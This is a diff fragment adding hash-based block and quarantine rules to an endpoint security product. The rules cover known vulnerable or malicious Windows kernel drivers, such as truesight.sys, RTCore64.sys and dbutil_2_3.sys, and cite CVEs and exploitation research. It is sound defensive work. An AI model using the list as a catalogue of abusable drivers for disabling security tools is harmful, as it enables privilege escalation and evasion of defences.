+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72190ae623520142cb34bfdc76b04b76bf1293ad7cc96827cb27b7c9cb44ac6d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "040d99da-dace-552a-b0d4-1406c2c8054c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973340Z",
+ "creation_date": "2026-03-23T11:45:29.973342Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973347Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351",
+ "comment": "Voicemod Sociedad Limitada vulnerable driver (aka vmdrv.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "041ff1cd-b3b9-5941-81b3-d0931f57ad33",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617913Z",
+ "creation_date": "2026-03-23T11:45:29.617915Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617921Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1ce9e4600859293c59d884ea721e9b20b2410f6ef80699f8a78a6b9fad505dfc",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "04248533-2444-5e51-af83-9d552253ad9e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476493Z",
+ "creation_date": "2026-03-23T11:45:30.476496Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476506Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd2f1f7012fb1f4b2fb49be57af515cb462aa9c438e5756285d914d65da3745b",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "043aab6e-63d3-5a52-9ff3-d9ce9f89ab42",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.471655Z",
+ "creation_date": "2026-03-23T11:45:31.471659Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.471668Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8218462d1cd9f1c9815c7282600eb2dbc88215c56e3c2618e8784da29fb3ab04",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "04428a81-4f00-5fa8-95e6-a11ee8e7f984",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487162Z",
+ "creation_date": "2026-03-23T11:45:31.487164Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487170Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "796b4afe7d3976ca2e6e680860f4b374b45db8e86499fff4ef4365ba36fee072",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "044f82e6-8799-596e-a713-905e8d9405c7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460550Z",
+ "creation_date": "2026-03-23T11:45:30.460554Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460563Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ad0309c2d225d8540a47250e3773876e05ce6a47a7767511e2f68645562c0686",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "046ebb29-cf3d-5066-a846-2b9c28debf0b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617361Z",
+ "creation_date": "2026-03-23T11:45:29.617363Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617368Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4780da56667e01cdd7eff83c23c772d68deb4d9fdb69d5302f556bb424151f51",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "047816b9-c437-5c9d-a035-9435722b434b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984638Z",
+ "creation_date": "2026-03-23T11:45:29.984640Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984646Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42e170a7ab1d2c160d60abfc906872f9cfd0c2ee169ed76f6acb3f83b3eeefdb",
+ "comment": "Vulnerable Kernel Driver (aka BS_I2cIo.sys) [https://www.loldrivers.io/drivers/66be9e0a-9246-4404-b5b5-7fbde351668f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "047a07a6-c90d-557b-a1c5-a573e8d7d6c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976517Z",
+ "creation_date": "2026-03-23T11:45:29.976519Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976525Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2bbbe2ae5aa51868e7afc2c16c3a0a79fa3302e6830feeccca7f0363a62dddb4",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "047d8882-5302-5b74-9ce6-c818766e0e2a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479829Z",
+ "creation_date": "2026-03-23T11:45:31.479833Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479843Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "739f9676a4d86b0f725f1ebd897777123947ef5c24cf1f2822ffe4fbe9acff5c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "04a3135d-7592-5d1a-9fda-e6e9d020538e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456277Z",
+ "creation_date": "2026-03-23T11:45:30.456280Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456289Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "831b62145c21557928a694e6261e830f1545b5756ad51dcbd28a15fde570f4e7",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "04a3e689-0b75-509e-be90-19b1db24fea1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607165Z",
+ "creation_date": "2026-03-23T11:45:29.607168Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607173Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1",
+ "comment": "Dell vulnerable driver (aka dbutil_2_3.sys) [CVE-2021-21551] [https://github.com/SpikySabra/Kernel-Cactus] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "04aa5ae2-2d8e-5cd0-93cd-9702483d0a60",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830438Z",
+ "creation_date": "2026-03-23T11:45:30.830440Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830445Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cccd9bc2995be22986e22253724bf11c73d7a19ff77343c695cd888ad976c3d7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "04aee2b1-21d0-5a6f-ab12-c524f6233464",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141415Z",
+ "creation_date": "2026-03-23T11:45:31.141417Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141423Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "300dd42952024fcdc8d3bd90bd8892ba391b016f4f7f57543bda6d2ce12d371b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "04bc0990-91c5-5103-86cd-e58c14fa4ade",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454765Z",
+ "creation_date": "2026-03-23T11:45:30.454768Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454777Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "25454028a4f56d3c58747811a86be43397a6290d1a053bc30d97b41bf3c58c6f",
+ "comment": "Vulnerable Kernel Driver (aka jokercontroller.sys) [https://www.loldrivers.io/drivers/4c815256-2534-4476-b15d-7cbf24c80098/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "04ca5a1c-6ffa-5da4-8acc-3eec3abfdcbc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606917Z",
+ "creation_date": "2026-03-23T11:45:29.606919Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606924Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1a902521c5f82ad9acac815229a00e6ed9137b8d49106b64147b088ff89d0f01",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "04d06975-93bd-5453-bdf1-ac7a5049d4ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615748Z",
+ "creation_date": "2026-03-23T11:45:29.615750Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615755Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d82a938dc7b0077a06d940bd3ce6097e3b02cdc254ec6fd863c0e526f2af69fa",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "04e42d59-a467-5cc4-9bbe-3d1bbc3e1998",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454891Z",
+ "creation_date": "2026-03-23T11:45:30.454894Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454903Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "407ca87833bd0931eec8005bb125e56d5765058c9b6422620aa95d8b2044239a",
+ "comment": "Vulnerable Kernel Driver (aka NICM.sys) [https://www.loldrivers.io/drivers/0f8e317e-ad2b-4b02-9f96-603bb8d28604/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "04e603d7-2f2c-58b8-a465-e47c1484269b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985198Z",
+ "creation_date": "2026-03-23T11:45:29.985200Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985206Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d852810a7319e3249077a1b9f1317f6f4157a19bb99b90063d118c30c2c84ac2",
+ "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "04fa0d38-9059-5ef5-9bc3-d5c472e45a78",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153613Z",
+ "creation_date": "2026-03-23T11:45:31.153615Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153621Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "67437ca0f3ca0fe5ae7bbce6fc834e0252a936035d3d57bc069830c9d3ee2e15",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "04fdd464-f581-5107-877f-047f8a476e12",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815473Z",
+ "creation_date": "2026-03-23T11:45:31.815475Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815480Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eb121a1776e70ee10b82d6818e6e91cd53966c498677c7d261b40d064be60831",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0506e24a-c838-5717-b346-0cf6040f7795",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969819Z",
+ "creation_date": "2026-03-23T11:45:29.969821Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969826Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f6cb70c945e7b3723de1d334aa2fb97bb8ddb9f68e409deeb9988f446546a57c",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
